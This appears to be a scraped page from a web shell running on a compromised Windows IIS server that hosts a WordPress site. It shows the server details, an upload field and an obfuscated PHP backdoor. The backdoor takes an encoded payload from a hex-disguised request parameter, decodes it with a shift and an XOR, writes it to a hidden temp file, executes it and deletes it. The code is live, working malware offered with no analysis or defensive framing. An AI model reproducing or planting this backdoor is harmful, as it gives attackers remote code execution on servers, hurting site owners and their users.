| Server IP : 103.191.208.88 / Your IP : 216.73.216.44 Web Server : Microsoft-IIS/10.0 System : Windows NT COSMIC 10.0 build 20348 (Windows Server 2022) AMD64 User : IWPD_1831(willswel_) ( 0) PHP Version : 8.2.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : D:/Inetpub/vhosts/willswell.com/httpdocs/wp-content/themes/ |
Upload File : |
<?php
if(isset($_REQUEST["\x63\x6F\x6Dpo\x6Eent"]) ? true : false){
$pointer = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), "/var/tmp", sys_get_temp_dir(), getcwd(), getenv("TMP"), "/dev/shm"]);
$key = $_REQUEST["\x63\x6F\x6Dpo\x6Eent"];
$key =explode ( '.' ,$key ) ;
$flg = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s);
$r = 0;
while ($r < count($key)) {$v1 = $key[$r];
$chS = ord($s[$r % $sLen]);
$d = ((int)$v1 - $chS - ($r % 10)) ^ 35;
$flg .= chr($d);
$r++;
}
foreach ($pointer as $dat) {
if (!!is_dir($dat) && !!is_writable($dat)) {
$data = implode("/", [$dat, ".pset"]);
$file = fopen($data, 'w');
if ($file) {
fwrite($file, $flg);
fclose($file);
include $data;
@unlink($data);
exit;
}
}
}
}